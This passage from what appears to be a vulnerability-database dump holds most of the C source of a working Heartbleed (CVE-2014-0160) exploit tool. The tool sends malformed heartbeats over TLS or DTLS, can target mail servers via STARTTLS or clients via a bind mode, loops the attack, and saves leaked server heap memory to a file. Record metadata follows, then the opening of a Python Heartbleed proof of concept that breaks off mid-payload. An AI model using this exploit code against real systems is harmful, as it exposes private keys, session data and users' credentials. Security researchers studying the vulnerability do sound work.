&(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\n\r\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n\tDTLS1_BITMAP *bitmap;\r\n\tunsigned int is_next_epoch;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned int mac_size, orig_len;\r\n\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n\r\nagain:\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n\r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n\t\t\tn2s(p,rr->epoch);\r\n\t\t\tmemcpy(&(s->s3->read_sequence[2]), p, 6);\r\n\t\t\tp+=6;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n\r\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\t\tif ( n != i)\r\n\t\t\t{\r\n\t\t\trr->length = 0;\r\n\t\t\ts->packet_length = 0;\r\n\t\t\tgoto again;\r\n\t\t\t}\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n\r\n\tbitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);\r\n\tif ( bitmap == NULL)\r\n\t\t{\r\n\t\trr->length = 0;\r\n\t\ts->packet_length = 0;\r\n\t\tgoto again;\r\n\t\t}\r\n\r\n\t\tif (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\r\n\t\t *p == SSL3_MT_CLIENT_HELLO) &&\r\n\t\t !dtls1_record_replay_check(s, bitmap))\r\n\t\t\t{\r\n\t\t\trr->length = 0;\r\n\t\t\ts->packet_length=0;\r\n\t\t\tgoto again;\r\n\t\t\t}\r\n\r\n\tif (rr->length == 0) goto again;\r\nif (is_next_epoch)\r\n\t\t{\r\n\t\tif ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\r\n\t\t\t{\r\n\t\t\tdtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\r\n\t\t\t}\r\n\t\trr->length = 0;\r\n\t\ts->packet_length = 0;\r\n\t\tgoto again;\r\n\t\t}\r\n\r\n\r\n rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n\torig_len=rr->length;\r\n\r\n dtls1_enc(s,0);\r\n\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tdtls1_record_bitmap_update(s, &(s->d1->bitmap));\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\r\n\t\t\tdtls1_stop_timer(c->sslHandle);\r\n\t\t\tc->sslHandle->tlsext_hb_seq++;\r\n\t\t\tc->sslHandle->tlsext_hb_pending = 0;\r\n\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nstatic DTLS1_BITMAP *\r\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\r\n {\r\n \r\n *is_next_epoch = 0;\r\n\r\n if (rr->epoch == s->d1->r_epoch)\r\n return &s->d1->bitmap;\r\n\r\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\r\n (rr->type == SSL3_RT_HANDSHAKE ||\r\n rr->type == SSL3_RT_ALERT))\r\n {\r\n *is_next_epoch = 1;\r\n return &s->d1->next_bitmap;\r\n }\r\n\r\n return NULL;\r\n }\r\n\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\r\n\t{\r\n\tint cmp;\r\n\tunsigned int shift;\r\n\tconst unsigned char *seq = s->s3->read_sequence;\r\n\r\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\r\n\tif (cmp > 0)\r\n\t\t{\r\n\t\tmemcpy (s->s3->rrec.seq_num,seq,8);\r\n\t\treturn 1;\r\n\t\t}\r\n\tshift = -cmp;\r\n\tif (shift >= sizeof(bitmap->map)*8)\r\n\t\treturn 0;\r\n\telse if (bitmap->map & (1UL<<shift))\r\n\t\treturn 0;\r\n\r\n\tmemcpy (s->s3->rrec.seq_num,seq,8);\r\n\treturn 1;\r\n\t}\r\n\r\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\r\n{\tint ret,sat,brw,i;\r\n\r\n\tif (sizeof(long) == 8) do\r\n\t{\tconst union { long one; char little; } is_endian = {1};\r\n\t\tlong l;\r\n\r\n\t\tif (is_endian.little)\t\t\tbreak;\r\n\r\n\t\tif (((size_t)v1|(size_t)v2)&0x7)\tbreak;\r\n\r\n\t\tl = *((long *)v1);\r\n\t\tl -= *((long *)v2);\r\n\t\tif (l>128)\t\treturn 128;\r\n\t\telse if (l<-128)\treturn -128;\r\n\t\telse\t\t\treturn (int)l;\r\n\t} while (0);\r\n\r\n\tret = (int)v1[7]-(int)v2[7];\r\n\tsat = 0;\r\n\tbrw = ret>>8;\r\n\tif (ret & 0x80)\r\n\t{\tfor (i=6;i>=0;i--)\r\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\r\n\t\t\tsat |= ~brw;\r\n\t\t\tbrw >>= 8;\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\tfor (i=6;i>=0;i--)\r\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\r\n\t\t\tsat |= brw;\r\n\t\t\tbrw >>= 8;\r\n\t\t}\r\n\t}\r\n\tbrw <<= 8;\r\n\r\n\tif (sat&0xff)\treturn brw | 0x80;\r\n\telse\t\treturn brw + (ret&0xFF);\r\n}\r\n\r\nstatic int\r\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\r\n\t{\r\n\tDTLS1_RECORD_DATA *rdata;\r\n\tpitem *item;\r\n\r\n\tif (pqueue_size(queue->q) >= 100)\r\n\t\treturn 0;\r\n\t\t\r\n\trdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\r\n\titem = pitem_new(priority, rdata);\r\n\tif (rdata == NULL || item == NULL)\r\n\t\t{\r\n\t\tif (rdata != NULL) OPENSSL_free(rdata);\r\n\t\tif (item != NULL) pitem_free(item);\r\n\t\t\r\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n\t\treturn(0);\r\n\t\t}\r\n\t\r\n\trdata->packet = s->packet;\r\n\trdata->packet_length = s->packet_length;\r\n\tmemcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));\r\n\tmemcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\r\n\r\n\titem->data = rdata;\r\n\r\n#ifndef OPENSSL_NO_SCTP\r\n\tif (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\r\n\t (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\r\n\t\tBIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\r\n\t}\r\n#endif\r\n\r\n\tif (pqueue_insert(queue->q, item) == NULL)\r\n\t\t{\r\n\t\tOPENSSL_free(rdata);\r\n\t\tpitem_free(item);\r\n\t\treturn(0);\r\n\t\t}\r\n\r\n\ts->packet = NULL;\r\n\ts->packet_length = 0;\r\n\tmemset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\r\n\tmemset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\r\n\t\r\n\tif (!ssl3_setup_buffers(s))\r\n\t\t{\r\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n\t\tOPENSSL_free(rdata);\r\n\t\tpitem_free(item);\r\n\t\treturn(0);\r\n\t\t}\r\n\t\r\n\treturn(1);\r\n\t}\r\n\r\n\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\r\n\t{\r\n\tint cmp;\r\n\tunsigned int shift;\r\n\tconst unsigned char *seq = s->s3->read_sequence;\r\n\r\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\r\n\tif (cmp > 0)\r\n\t\t{\r\n\t\tshift = cmp;\r\n\t\tif (shift < sizeof(bitmap->map)*8)\r\n\t\t\tbitmap->map <<= shift, bitmap->map |= 1UL;\r\n\t\telse\r\n\t\t\tbitmap->map = 1UL;\r\n\t\tmemcpy(bitmap->max_seq_num,seq,8);\r\n\t\t}\r\n\telse\t{\r\n\t\tshift = -cmp;\r\n\t\tif (shift < sizeof(bitmap->map)*8)\r\n\t\t\tbitmap->map |= 1UL<<shift;\r\n\t\t}\r\n\t}\r\n\r\n\r\nvoid usage(){\r\n\tprintf("[\\n");\r\n\tprintf("[ --server|-s <ip/dns> - the server to target\\n");\r\n\tprintf("[ --port|-p <port> - the port to target\\n");\r\n\tprintf("[ --file|-f <filename> - file to write data to\\n");\r\n\tprintf("[ --bind|-b <ip> - bind to ip for exploiting clients\\n");\r\n\tprintf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n");\r\n\tprintf("[\t\t\t 0 = SMTP\\n");\r\n\tprintf("[\t\t\t 1 = POP3\\n");\r\n\tprintf("[\t\t\t 2 = IMAP\\n");\r\n\tprintf("[ --loop|-l\t\t - loop the exploit attempts\\n");\r\n\tprintf("[ --type|-t <n> - select exploit to try\\n");\r\n\tprintf("[ 0 = null length\\n");\r\n\tprintf("[\t\t\t 1 = max leak\\n");\r\n\tprintf("[\t\t\t n = heartbeat payload_length\\n");\r\n\tprintf("[ --udp|-u - use dtls/udp\\n");\r\n\tprintf("[\\n");\r\n\tprintf("[ --verbose|-v - output leak to screen\\n");\r\n\tprintf("[ --help|-h - this output\\n");\r\n\tprintf("[\\n");\r\n\texit(0);\r\n}\r\n\r\nint main(int argc, char* argv[]){\r\n\tint ret, port, userc, index;\r\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n\tint loop = 0;\r\n\tstruct hostent *h;\r\n\tconnection* c;\r\n\tchar *host, *file;\r\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n\tprintf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n");\r\n\tprintf("[ =============================================================\\n");\r\n static struct option options[] = {\r\n \t{"server", 1, 0, 's'},\r\n\t {"port", 1, 0, 'p'},\r\n\t\t{"file", 1, 0, 'f'},\r\n\t\t{"type", 1, 0, 't'},\r\n\t\t{"bind", 1, 0, 'b'},\r\n\t\t{"verbose", 0, 0, 'v'},\r\n\t\t{"precmd", 1, 0, 'c'},\r\n\t\t{"loop", 0, 0, 'l'},\r\n\t\t{"help", 0, 0,'h'},\r\n\t\t{"udp", 0, 0, 'u'}\r\n };\r\n\twhile(userc != -1) {\r\n\t userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvhu",options,&index);\t\r\n \tswitch(userc) {\r\n \t\tcase -1:\r\n\t break;\r\n \t case 's':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\r\n\t\t\t\t\tif(h==NULL){\r\n\t\t\t\t\t\tprintf("[!] FATAL: unknown host '%s'\\n",optarg);\r\n\t\t\t\t\t\texit(1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(host==NULL){\r\n \t\t\t\tprintf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n \t\t\t}\r\n\t\t\t\tbreak;\r\n\t case 'p':\r\n\t\t\t\tif(iport==0){\r\n\t\t\t\t\tport = atoi(optarg);\r\n\t\t\t\t\tiport = 1;\r\n\t\t\t\t}\r\n \t break;\r\n\t\t\tcase 'f':\r\n\t\t\t\tif(ifile==0){\r\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(file==NULL){\r\n\t\t\t\t printf("[ error in malloc()\\n");\r\n \t\t\t\texit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(file,"%s",optarg);\r\n\t\t\t\t\tifile = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 't':\r\n\t\t\t\tif(itype==0){\r\n\t\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\t\titype = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'h':\r\n\t\t\t\tusage();\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'b':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\r\n\t\t\t\t\tif(host==NULL){\r\n\t\t\t \t printf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n\t\t\t\t }\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n\t\t\t\t\tbind = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'c':\r\n\t\t\t\tif(iprecmd == 0){\r\n\t\t\t\t\tiprecmd = 1;\r\n\t\t\t\t\tprecmd = atoi(optarg);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'v':\r\n\t\t\t\tverbose = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\tloop = 1;\r\n\t\t\t\tbreak;\r\n \t case 'u':\r\n\t\t\t\tudp = 1;\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tdefault:\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif(ihost==0||iport==0||ifile==0||itype==0){\r\n\t\tprintf("[ try --help\\n");\r\n\t\texit(0);\r\n\t}\r\n\tssl_init();\r\n\tif(bind==0){\r\n\t\tif (udp){\r\n\t\t\tc = dtls_client(ret, host, port);\r\n\t\t\tdtlsheartbleed(c, type);\r\n\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t\twhile(loop==1){\r\n\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\tfirst=0;\r\n\t\t\t\trepeat=1;\r\n\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse {\r\n\t\t\tret = tcp_connect(host, port);\r\n\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\tc = tls_connect(ret);\r\n\t\t\theartbleed(c,type);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t\twhile(loop==1){\r\n\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\tfirst=0;\r\n\t\t\t\trepeat=1;\r\n\t\t\t\theartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tSSL_shutdown(c->sslHandle);\r\n\t\tclose (ret);\r\n\t\tSSL_free(c->sslHandle);\r\n\t}\r\n\telse{\r\n\t\tint sd, pid, i;\r\n\t\tif (udp) {\r\n\t\t\tc = dtls_server(sd, host, port);\r\n\t\t\twhile (1) {\r\n\t\t\t\tchar * bytes = malloc(1024);\r\n\t\t\t\tstruct sockaddr_in peer;\r\n\t\t\t\tsocklen_t len = sizeof(peer);\r\n\t\t\t\t\tif (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\r\n\t\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\twhile(loop==1){\r\n\t\t\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\t\t\tfirst=0;\r\n\t\t\t\t\t\t\trepeat=0;\r\n\t\t\t\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse {\r\n\t\t\tret = tcp_bind(host, port);\r\n\t\t\twhile(1){\r\n\t \t\t\tsd=accept(ret,0,0);\r\n\t\t\t\tif(sd==-1){\r\n\t\t\t\t\tprintf("[!] FATAL: problem with accept()\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tif(pid=fork()){\r\n\t\t\t\t\tclose(sd);\r\n\t\t\t\t}\r\n\t \t\t\telse{\r\n\t\t\t\t\tc = tls_bind(sd);\r\n\t\t\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t}\r\n\t\t\t\t\twhile(loop==1){\r\n\t\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\t\tfirst=0;\r\n\t\t\t\t\t\trepeat=0;\r\n\t\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\tprintf("[ done.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86255", "status": "cve,poc"}, {"lastseen": "2017-11-19T13:24:13", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "lele", "published": "2014-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "seebug", "title": "OpenSSL TLS Heartbeat Extension - Memory Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86019", "id": "SSV:86019", "sourceData": "\n #!/usr/bin/python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 